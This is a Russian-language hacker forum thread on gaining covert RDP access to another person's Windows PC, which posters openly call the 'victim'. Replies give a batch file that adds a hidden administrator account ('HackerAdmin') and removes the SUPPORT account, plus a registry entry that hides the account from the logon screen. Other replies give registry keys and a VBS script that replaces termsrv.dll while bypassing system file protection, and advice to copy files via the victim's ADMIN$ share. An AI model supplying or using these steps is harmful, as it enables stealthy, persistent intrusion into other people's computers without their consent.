Народ, вот у меня такая проблема: Прописал параметр в реестр, что бы включить возможность подключения через rdp, но при входе, пишет, мол одна учетная запись уже работает Как можно это изменить, и желательно без палевно?
Хм,насчет беспалевности затрудняюсь ответить. Возможен такой вариант(я так через телнет иногда подключаюсь). Сразу скажу,что это самый палевный вариант из все возможных Пишешь батник: Code: chcp 1251 net user SUPPORT_388945a0 /delete net user HackerAdmin mygoodpassword /add net localgroup Администраторы hacker /add net localgroup Пользователи SUPPORT_388945a0 /del regedit /s conf.reg (SUPPORT_388945a0 для xp prof и 2003сервер) т.е. добавляешь нового пользователя с админскими правами и удаляешь первоначального. Но т.к. при создании нового администратора, он будет виден в Вэлком Скрине, отключить его можно импортировав рег файл в реестр, следующего содержания: Содержимое conf.reg Code: Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserLis t] "HackerAdmin"=dword:00000000 Безусловно,это не весь батник,а лишь его основа.
У тебя есть возможность подойти к ПК локально?.. Если есть, и на нем установлена OC Windows XP, то делай так, ну а потом извращайся.. Если честно, то не пробовал такой способ сам.. Я заменял библиотеку termsrv на самую раннюю, она еще с беты(если не ошибаюсь).. Если этот способ не поможет, то отпишись, опишу другой..
Для этого сначала надо будет скачать вот эту библиотеку.. Потом проделать это: 1) Создай такие ключи: "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Licensing Core\EnableConcurrentSessions", "00000001", "REG_DWORD" "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services\MaxInstanceCount", "00000003", "REG_DWORD" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions", "00000001", "REG_DWORD" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LogonType", "00000001", "REG_DWORD" 2) Замени системную библиотеку на скачанную (только замена руками очень затруднительна, т.к. система хорошо следит за целостностью, я использую vbs-скрипты или подобное): system_folder = "c:\windows\system32\" system_cache = "c:\windows\system32\dllcache\" new_dll = "termsrv.dll" cache_dll = "C:\windows\system32\dllcache\termsrv.dll" old_dll = "C:\windows\system32\termsrv.dll" old_name = "termsrv_old.dll" fso.MoveFile cache_dll, system_cache & old_name fso.CopyFile new_dll, system_cache, true fso.MoveFile old_dll, system_folder & old_name fso.CopyFile new_dll, system_folder, true 3) Система ругнется на то, что целостность улетела в аут, и предложит восстановить все, жмите не надо, перезагрузитесь, и пробуйте.. Отпишитесь, заработает или нет.. Если нет, попробую сделать exe-шник для всех этих махинаций..
Ну как я понимаю пасс админа ты знаешь, так что копируй по этому пути: \\жертва\ADMIN$ .. Единственная проблема это защитник системный файлов, он ругнется в консольный сеанс, но я думаю потом выложу чтонить против него.. Ну а если RDP по инету, то просто разок подчикирь человека и выбей, а потом глумись..
